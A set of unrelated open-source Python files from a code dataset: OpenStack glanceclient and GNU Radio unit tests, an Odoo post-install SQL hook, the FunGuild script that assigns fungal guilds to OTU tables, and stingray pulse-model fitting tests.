"type": "number"
},
"maxItems": {
"$ref": "#/definitions/positiveInteger"
},
"maxLength": {
"$ref": "#/definitions/positiveInteger"
},
"uniqueItems": {
"default": False,
"type": "boolean"
},
"additionalItems": {
"type": "boolean"
},
"name": {
"type": "string"
},
"title": {
"type": "string"
},
"default": {},
"pattern": {
"type": "string",
"format": "regex"
},
"required": {
"$ref": "#/definitions/stringArray"
},
"maximum": {
"type": "number"
},
"minItems": {
"$ref": "#/definitions/positiveIntegerDefault0"
},
"readonly": {
"type": "boolean"
},
"items": {
"type": "object",
"properties": {
"enum": {
"type": "array"
},
"type": {
"enum": [
"array",
"boolean",
"integer",
"number",
"object",
"string",
"null"
],
"type": "string"
}
}
},
"type": {
"enum": [
"array",
"boolean",
"integer",
"number",
"object",
"string",
"null"
],
"type": "string"
}
}
}
)
}
}
class TestPropertyController(testtools.TestCase):
def setUp(self):
super(TestPropertyController, self).setUp()
self.api = utils.FakeAPI(data_fixtures)
self.schema_api = utils.FakeSchemaAPI(schema_fixtures)
self.controller = metadefs.PropertyController(self.api,
self.schema_api)
def test_list_property(self):
properties = list(self.controller.list(NAMESPACE1))
actual = [prop.name for prop in properties]
self.assertEqual(sorted([PROPERTY1, PROPERTY2]), sorted(actual))
def test_get_property(self):
prop = self.controller.get(NAMESPACE1, PROPERTY1)
self.assertEqual(PROPERTY1, prop.name)
def test_create_property(self):
properties = {
'name': PROPERTYNEW,
'title': 'TITLE',
'type': 'string'
}
obj = self.controller.create(NAMESPACE1, **properties)
self.assertEqual(PROPERTYNEW, obj.name)
def test_create_property_invalid_property(self):
properties = {
'namespace': NAMESPACE1
}
self.assertRaises(TypeError, self.controller.create, **properties)
def test_update_property(self):
properties = {
'description': 'UPDATED_DESCRIPTION'
}
prop = self.controller.update(NAMESPACE1, PROPERTY1, **properties)
self.assertEqual(PROPERTY1, prop.name)
def test_update_property_invalid_property(self):
properties = {
'type': 'INVALID'
}
self.assertRaises(TypeError, self.controller.update, NAMESPACE1,
PROPERTY1, **properties)
def test_update_property_disallowed_fields(self):
properties = {
'description': 'UPDATED_DESCRIPTION'
}
self.controller.update(NAMESPACE1, PROPERTY1, **properties)
actual = self.api.calls
_disallowed_fields = ['created_at', 'updated_at']
for key in actual[1][3]:
self.assertNotIn(key, _disallowed_fields)
def test_delete_property(self):
self.controller.delete(NAMESPACE1, PROPERTY1)
expect = [
('DELETE',
'/v2/metadefs/namespaces/%s/properties/%s' % (NAMESPACE1,
PROPERTY1),
{},
None)]
self.assertEqual(expect, self.api.calls)
def test_delete_all_properties(self):
self.controller.delete_all(NAMESPACE1)
expect = [
('DELETE',
'/v2/metadefs/namespaces/%s/properties' % NAMESPACE1,
{},
None)]
self.assertEqual(expect, self.api.calls)
| sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/glanceclient/tests/unit/v2/test_metadefs_properties.py | Python | mit | 10,072 |
#!/usr/bin/env python
#
# Copyright 2004,2007,2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr, gr_unittest, blocks
class test_add_mult_div_sub(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def help_ii(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_i(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_i()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
def help_ss(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_s(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_s()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
def help_ff(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_f(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_f()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
def help_cc(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_c(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_c()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
# add_XX
def test_add_ss(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [9, -1, 7, 12, 7]
op = blocks.add_ss()
self.help_ss((src1_data, src2_data), expected_result, op)
def test_add_ii(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [9, -1, 7, 12, 7]
op = blocks.add_ii()
self.help_ii((src1_data, src2_data), expected_result, op)
def test_add_ff(self):
src1_data = [1.0, 2.0, 3.0, 4.0, 5.0]
src2_data = [8.0, -3.0, 4.0, 8.0, 2.0]
expected_result = [9.0, -1.0, 7.0, 12.0, 7.0]
op = blocks.add_ff()
self.help_ff((src1_data, src2_data), expected_result, op)
def test_add_cc(self):
src1_data = [1+1j, 2+2j, 3+3j, 4+4j, 5+5j]
src2_data = [8+8j, -3-3j, 4+4j, 8+8j, 2+2j]
expected_result = [9+9j, -1-1j, 7+7j, 12+12j, 7+7j]
op = blocks.add_cc()
self.help_cc((src1_data, src2_data), expected_result, op)
# add_const_XX
def test_add_const_ss(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [6, 7, 8, 9, 10]
op = blocks.add_const_ss(5)
self.help_ss((src_data,), expected_result, op)
def test_add_const_ii(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [6, 7, 8, 9, 10]
op = blocks.add_const_ii(5)
self.help_ii((src_data,), expected_result, op)
def test_add_const_ff(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [6, 7, 8, 9, 10]
op = blocks.add_const_ff(5)
self.help_ff((src_data,), expected_result, op)
def test_add_const_cc(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [1+5j, 2+5j, 3+5j, 4+5j, 5+5j]
op = blocks.add_const_cc(5j)
self.help_cc((src_data,), expected_result, op)
# multiply_XX
def test_multiply_ss(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8, -6, 12, 32, 10]
op = blocks.multiply_ss()
self.help_ss((src1_data, src2_data),
expected_result, op)
def test_multiply_ii(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8, -6, 12, 32, 10]
op = blocks.multiply_ii()
self.help_ii((src1_data, src2_data),
expected_result, op)
def test_multiply_ff(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8, -6, 12, 32, 10]
op = blocks.multiply_ff()
self.help_ff((src1_data, src2_data),
expected_result, op)
def test_multiply_cc(self):
src1_data = [1+1j, 2+2j, 3+3j, 4+4j, 5+5j]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8+8j, -6-6j, 12+12j, 32+32j, 10+10j]
op = blocks.multiply_cc()
self.help_cc((src1_data, src2_data),
expected_result, op)
# multiply_const_XX
def test_multiply_const_ss(self):
src_data = [-1, 0, 1, 2, 3]
expected_result = [-5, 0, 5, 10, 15]
op = blocks.multiply_const_ss(5)
self.help_ss((src_data,), expected_result, op)
def test_multiply_const_ii(self):
src_data = [-1, 0, 1, 2, 3]
expected_result = [-5, 0, 5, 10, 15]
op = blocks.multiply_const_ii(5)
self.help_ii((src_data,), expected_result, op)
def test_multiply_const_ff(self):
src_data = [-1, 0, 1, 2, 3]
expected_result = [-5, 0, 5, 10, 15]
op = blocks.multiply_const_ff(5)
self.help_ff((src_data,), expected_result, op)
def test_multiply_const_cc(self):
src_data = [-1-1j, 0+0j, 1+1j, 2+2j, 3+3j]
expected_result = [-5-5j, 0+0j, 5+5j, 10+10j, 15+15j]
op = blocks.multiply_const_cc(5)
self.help_cc((src_data,), expected_result, op)
def test_multiply_const_cc2(self):
src_data = [-1-1j, 0+0j, 1+1j, 2+2j, 3+3j]
expected_result = [-3-7j, 0+0j, 3+7j, 6+14j, 9+21j]
op = blocks.multiply_const_cc(5+2j)
self.help_cc((src_data,), expected_result, op)
def test_sub_ii(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_ii()
self.help_ii((src1_data, src2_data),
expected_result, op)
def test_sub_ii1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_i(src1_data)
op = blocks.sub_ii()
dst = blocks.vector_sink_i()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_sub_ss(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_ss()
self.help_ss((src1_data, src2_data),
expected_result, op)
def test_sub_ss1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_s(src1_data)
op = blocks.sub_ss()
dst = blocks.vector_sink_s()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_sub_ff(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_ff()
self.help_ff((src1_data, src2_data),
expected_result, op)
def test_sub_ff1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_f(src1_data)
op = blocks.sub_ff()
dst = blocks.vector_sink_f()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_sub_cc(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_cc()
self.help_cc((src1_data, src2_data),
expected_result, op)
def test_sub_cc1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_c(src1_data)
op = blocks.sub_cc()
dst = blocks.vector_sink_c()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_div_ff(self):
src1_data = [ 5, 9, -15, 1024]
src2_data = [10, 3, -5, 64]
expected_result = [0.5, 3, 3, 16]
op = blocks.divide_ff()
self.help_ff((src1_data, src2_data), expected_result, op)
if __name__ == '__main__':
gr_unittest.run(test_add_mult_div_sub, "test_add_mult_div_sub.xml")
| jdemel/gnuradio | gr-blocks/python/blocks/qa_add_mult_div_sub.py | Python | gpl-3.0 | 8,995 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# account_analytic_project_id
# Copyright (c) 2015 Acsone SA/NV (http://www.acsone.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
def set_account_analytic_account_project_id(cr, pool):
'''
Initialize the project_id field in case the module is
installed when projects already exist
'''
cr.execute("""
update account_analytic_account
set project_id = (select id
from project_project where
analytic_account_id = account_analytic_account.id)
""")
return
| acsone/acsone-addons | account_analytic_project_id/post_install.py | Python | agpl-3.0 | 1,398 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (C) 2014-2015 Zewei Song
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
This script assigns functional information to the OTUs in the user's OTU table. The OTU table needs to have a column named 'taxonomy', which contains information from a reference database (such as UNITE - https://unite.ut.ee/). It is required that the first line of the OTU table to be the header, without any additional comments. Some programs, such as QIIME will add an additional row of comments before the header, and this has to be removed before using the FunGuild script. The script will try to recognized the delimiter in the user's OTU table, but comma (.csv) or tab (.txt) delimiter formats are recommended.
The functional databases are fetched from http://www.stbates.org/funguild_db.php or http://www.stbates.org/nemaguild_db.php
Script usage: Guilds_v1.0.py [-h] [-otu OTU_file] [-db] [-m] [-u]
optional arguments:
-h, --help Show this help message and exit
-otu OTU Path and file name of the OTU table. The script will try to
detect the delimiters in the file, but tab or csv are
preferred formats.
-db Database to use ('fungi' or 'nematode') [default:fungi]
-m, --matched Ask the script to output an otu table containing only OTUs
for which functional assignments have been made
-u, --unmatched Ask the script to output an otu table containing only OTUs
for which functional assignments could not be made
This is an example command to run this script:
python Guilds_v1.0.py -otu user_otu_table.txt
The script will have one output file with suffix on the input file: user_otu_table.function.txt
By using -m and -u, the script will produce two additional files:
-m will output a file containing only OTUs that have been assigned a function: user_otu_table.matched.txt
-u will output a file containing only OTUs that were not matched in the database: user_otu_table.unmatched.txt
Care should be taken in managing directories as existing files will be overwritten without notice if matching file names (e.g., user_otu_table.matched.txt) are generated by the script.
By using the -db option, you will call the database for your group of organism. Currently 'fungi' and 'nematode'. The default is 'fungi'.
All output tables are sorted according to the sum total number of sequences corresponding to each OTU (rank OTU abundance).
###################################################################################
Development history:
The idea of parsing OTUs into functions originated from an python script by Sara Branco that segregated Ectomycorrhizal (EM), potential EM, and non-EM fungal OTUs (Branco et al. 2013. PLoS One 8: 1–10).
The algorithm used by FunGuild was first developed by Scott T. Bates in R to assign functions to any fungal taxon and to indicate a probability for the assignment.
The current FunGuild script has been developed by Zewei Song in python in order to improve functionality, performance and cross-platform compatibility.
###################################################################################
Zewei Song
2/14/2015
songzewei@outlook.com
'''
from __future__ import print_function
from __future__ import division
#Import modules#################
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import range
from past.utils import old_div
import argparse
import os
import timeit
import sys
from operator import itemgetter
import csv
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", help="Path and file name of the OTU table. The script will try to detect the delimiter"
"in the file, but tab or csv are preferred formats.")
parser.add_argument("-m", "--matched", action="store_true", help="Ask the script to output a otu table with function assigned OTUs")
parser.add_argument("-u", "--unmatched", action="store_true", help="Ask the script to output a otu table with function assigned OTUs")
parser.add_argument("-d","--db", choices=['fungi','nematode'], default='fungi', help="Assign a specified database to the script")
parser.add_argument("-o","--out", help="Output file base name")
args = parser.parse_args(args)
start = timeit.default_timer()
#input files
otu_file = args.input
#Detect delimiter in the input file
with open(otu_file, 'r') as f1:
dialect = csv.Sniffer().sniff(f1.read())
otu_delimiter = str(dialect.delimiter)
if otu_delimiter == str(';'):
out_delimiter = str('\t')
#setup the output files and naming
if args.out:
base = args.out
else:
base = args.input.split('.otu_table.taxonomy.txt')[0]
matched_file = base + '.guilds_matched.txt'
unnmatched_file = base + '.guilds_unmatched.txt'
total_file = base + '.guilds.txt'
###########################################################################################
# Import Function Database from GitHub, and get it ready.##################################
print("FunGuild v1.0 Beta")
database_name = args.db
if database_name == 'fungi':
url = 'http://www.stbates.org/funguild_db.php'
elif database_name == 'nematode':
url = 'http://www.stbates.org/nemaguild_db.php'
print("Downloading %s database ..." % database_name)
function_file = 'temp_db.txt' #temp file to store database file
temp = 'temp.txt'
urlFile = urlopen(url)
data = urlFile.read().decode('utf-8')
new_data = data.split("} , {")
#Fix the first and last record
new_data[0] = new_data[0][3:]
new_data[-1]=new_data[-1][:-3]
#Parse the record and write temp data file
with open(function_file, 'w') as f:
f.write("Taxon\tTaxon Level\tTrophic Mode\tGuild\tConfidence Ranking\tGrowth Morphology\tTrait\tNotes\tCitation/Source\n")
parse_data = []
for line in new_data:
record = line
rec = record.split(" , ")
del rec[0]
current_rec = []
for item in rec:
p = item.find(":")
cleaned_item = item[p+2:].replace('"','')
current_rec.append(cleaned_item.encode('ascii', 'ignore').decode('ascii'))
f.write('{:}\n'.format('\t'.join(current_rec)))
#Detect the position of header
with open(function_file, 'r') as f_database:
for line in f_database:
if line.find('Taxon') != -1: #Search for the line that contains the header (if it is not the first line)
header_database = line.split('\t')
break
#Check the database header.
if len(header_database) == 1:
header_database = header_database[0].split(" ")
# Set the parameters for progress report
with open(function_file) as f1:
i = 0
for line in f1:
i += 1
total_length = float(i) #length of the database
p = list(range(1,11))
way_points = [int(total_length*(old_div(x,10.0))) for x in p]
############################################################################################
# Open the OTU table and read in the header ################################################
print("")
print("Reading in the OTU table: '%s'" %(args.input))
print("")
#load the header
with open(otu_file, 'r') as otu:
header = otu.readline().rstrip().split(otu_delimiter)
#Attach all columns of database file to the header of the new OTU table
for item in header_database:
header.append(item)
#look for Taxonomy or taxonomy
if 'taxonomy' in header:
lookup = 'taxonomy'
elif 'Taxonomy' in header:
lookup = 'Taxonomy'
# get the positions of the taxonomy column and Notes column
index_tax = header.index(lookup)
index_notes = header.index('Notes')
#Abort if the column 'taxonomy' is not found
if index_tax == -1:
print("Column 'taxonomy' not found. Please check you OTU table %s." %(otu_file))
sys.exit(0)
############################################################################################
#Search in function database################################################################
# Read the OTU table into memory, and separate taxonomic levels with '@'.
with open(otu_file, 'r') as otu:
otu_tab = []
for record in otu:
otu_current = record.split(otu_delimiter)
otu_taxonomy = otu_current[index_tax].rstrip('\n')
replace_list = ['_', ' ', ';', ',', ':']
for symbol in replace_list:
otu_taxonomy = otu_taxonomy.replace(symbol, '@')
otu_taxonomy = otu_taxonomy + '@'
otu_current[index_tax] = otu_taxonomy
otu_tab.append(otu_current)
otu_tab = otu_tab[1:] # remove the header line
# Start searching the database
## Each record in the Fungal Guild Database is searched in the user's OTU table.
count = 0 # count of matching records in the OTU table
percent = 0 # line number in the database
otu_redundant = []
otu_new = []
print("Searching the FUNGuild database...")
with open(function_file, 'rb') as f_database:
for record in f_database:
record = record.decode('utf-8')
# report the progress
percent += 1
if percent in way_points:
progress = (int(round(percent/total_length*100.0)))
print('{}%'.format(progress))
else: t = 0
# Compare database with the OTU table
function_tax = record.split('\t')
search_term = function_tax[0].replace(' ', '@') #first column of database, contains the name of the species
search_term = '@' + search_term + '@' #Add @ to the search term
#print(search_term)
for otu in otu_tab:
otu_tax = otu[index_tax] # Get the taxonomy string of current OTU record.
#print(otu_tax)
if otu_tax.find(search_term) >= 0: #found the keyword in this OTU's taxonomy
count += 1 # Count the matching record
otu_new = otu[:]
# Assign the matching functional information to current OTU record.
for item in function_tax:
otu_new.append(item)
otu_redundant.append(otu_new)
#sys.exit(1)
# Finish searching, delete the temp function database file
if os.path.isfile('temp_db.txt') == True:
os.remove('temp_db.txt')
print("")
print("Found %i matching taxonomy records in the database."%(count))
print("Dereplicating and sorting the result...")
#Dereplicate and write to output file##########################################################
#Sort by OTU names and Level. Level is sorted from species to kingdom.
otu_sort = otu_redundant[:]
otu_sort.sort(key = itemgetter(index_tax), reverse = True) # Sort the redundant OTU table by Taxonomic Level.
otu_sort.sort(key = itemgetter(0)) # Sort the redundant OTU table by OTU ID.
#Dereplicate the OTU table, unique OTU ID with lowest taxonomic level will be kept.
otu_id_list = []
unique_list = []
count = 0
for item in otu_sort:
if item[0] not in otu_id_list:
count += 1
otu_id_list.append(item[0])
unique_list.append(item)
#Copy the original taxonomy string (without @) to the unique OTU table
otu_tax = []
with open(otu_file, 'r') as f_otu:
for otu in f_otu:
temp = otu.rstrip('\n').split(otu_delimiter)
otu_tax.append(temp)
otu_tax = otu_tax[1:]
for new_rec in unique_list:
for rec in otu_tax:
if new_rec[0] == rec[0]:
new_rec[index_tax] = rec[index_tax]
#Sort the new otu table by the total sequence number of each OTU.
unique_list.sort(key=lambda x: float(sum(map(float,x[1:index_tax]))), reverse=True)
################################################################################################
#Write to output files##############################################################################
#Output matched OTUs to a new file
if args.matched:
if os.path.isfile(matched_file) == True:
os.remove(matched_file)
output = open(matched_file,'a')
#Write the matched list header
output.write('%s' % ('\t'.join(header))) #Header
#Write the matched OTU table
for item in unique_list:
rec = '\t'.join(item)
output.write('%s' % rec)
output.close()
#Output unmatched OTUs to a new file
unmatched_list = []
for rec in otu_tax:
count2 = 0
for new_rec in unique_list:
if rec[0] == new_rec[0]: #Check if the current record is in the unique_list (has been assigned a function)
count2 += 1
if count2 == 0:
unmatched_list.append(rec)
count_unmatched = 0
#Add 'Unassigned' to the 'Notes' column
for item in unmatched_list:
l = len(header) - len(item)
for i in range(l):
item.extend('-')
item[index_notes] = 'Unassigned'
if args.unmatched:
if os.path.isfile(unmatched_file) == True:
os.remove(unmatched_file)
output_unmatched = open(unmatched_file, 'a')
output_unmatched.write('%s' % ('\t'.join(header)))
for item in unmatched_list:
rec = '\t'.join(item)
output_unmatched.write('%s\n' % rec)
count_unmatched += 1
output_unmatched.close()
#Output the combined matched and unmatched OTUs to a new file
if os.path.isfile(total_file) == True:
os.remove(total_file)
total_list = unique_list + unmatched_list #Combine the two OTU tables
total_list.sort(key=lambda x: float(sum(map(float,x[1:index_tax]))), reverse=True) #Sorted the combined OTU table
output_total = open(total_file, 'a')
output_total.write('%s' % ('\t'.join(header)))
count_total = 0
for item in total_list:
rec = ('\t'.join(item)).strip('\n')
output_total.write('%s\n' % rec)
count_total += 1
output_total.close()
####################################################################################################################
#Print report on the screen#########################################################################################
print("FunGuild tried to assign function to %i OTUs in '%s'." %(count_total, otu_file))
print("FUNGuild made assignments on %i OTUs." %(count))
print("Result saved to '%s'" %(total_file))
if args.matched or args.unmatched:
print('\nAdditional output:')
if args.matched:
print("FUNGuild made assignments on %i OTUs, these have been saved to %s." %(count, matched_file))
if args.unmatched:
print("%i OTUs were unassigned, these are saved to %s." %(count_unmatched, unmatched_file))
# Finish the program
stop = timeit.default_timer()
runtime = round((stop-start),2)
print("\nTotal calculating time: {} seconds.".format(runtime))
if __name__ == "__main__":
main(args)
####################################################################################################################
| nextgenusfs/ufits | amptk/Guilds.py | Python | bsd-2-clause | 16,269 |
import numpy as np
from stingray.pulse.modeling import fit_sinc, fit_gaussian, SincSquareModel
np.random.seed(0)
def test_sinc_function():
x = np.linspace(-5., 5., 200)
y = 2 * (np.sin(x)/x)**2
y += np.random.normal(0., 0.1, x.shape)
s = fit_sinc(x, y)
assert np.abs(s.mean) < 0.1
assert np.abs(s.amplitude - 2) < 0.1
assert np.abs(s.width - 1) < 0.1
def test_sinc_fixed():
x = np.linspace(-5., 5., 200)
y = 2 * (np.sin(x)/x)**2
y += np.random.normal(0., 0.1, x.shape)
sf = fit_sinc(x, y, mean=1., fixed={"mean": True, "amplitude": False})
assert sf.mean.fixed
assert not sf.amplitude.fixed
def test_sinc_obs():
obs_length = 0.32
x = np.linspace(-5., 5., 200)
w = 1 / (np.pi*obs_length)
y = 2 * (np.sin(x / w) / (x / w))**2
y += np.random.normal(0., 0.1, x.shape)
s = fit_sinc(x, y, obs_length=obs_length)
assert np.abs(1 / (np.pi*obs_length) - s.width) < 0.1
assert s.width.fixed
def test_gaussian_function():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
gs = fit_gaussian(x, y)
assert np.abs(gs.mean - 1.3) < 0.1
assert np.abs(gs.amplitude - 2) < 0.1
assert np.abs(gs.stddev - 0.7) < 0.1
def test_gaussian_bounds():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
gs = fit_gaussian(x, y,
bounds={"mean": [1., 1.6], "amplitude": [1.7, 2.3]})
def test_gaussian_fixed():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
gs = fit_gaussian(x, y, mean=1.3, fixed={"mean": True, "amplitude": False})
assert gs.mean.fixed
assert not gs.amplitude.fixed
def test_gaussian_tied():
x = np.linspace(-5., 5., 200)
y = 2 * np.exp(-0.5 * (x - 1.3)**2 / 0.7**2)
y += np.random.normal(0., 0.1, x.shape)
def tiedgaussian(model):
mean = model.amplitude / 2
return mean
gs = fit_gaussian(x, y, tied={"mean": tiedgaussian})
assert np.abs(gs.mean/gs.amplitude - 0.5) < 0.1
def test_pickle_SincSquared():
import pickle
a = SincSquareModel(amplitude=13., mean=3, width=12.)
with open('bubufile.p', 'wb') as f:
pickle.dump(a, f)
with open('bubufile.p', 'rb') as f:
b = pickle.load(f)
assert a.amplitude == b.amplitude
assert a.mean == b.mean
assert a.width == b.width
| StingraySoftware/stingray | stingray/pulse/tests/test_modeling.py | Python | mit | 2,534 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.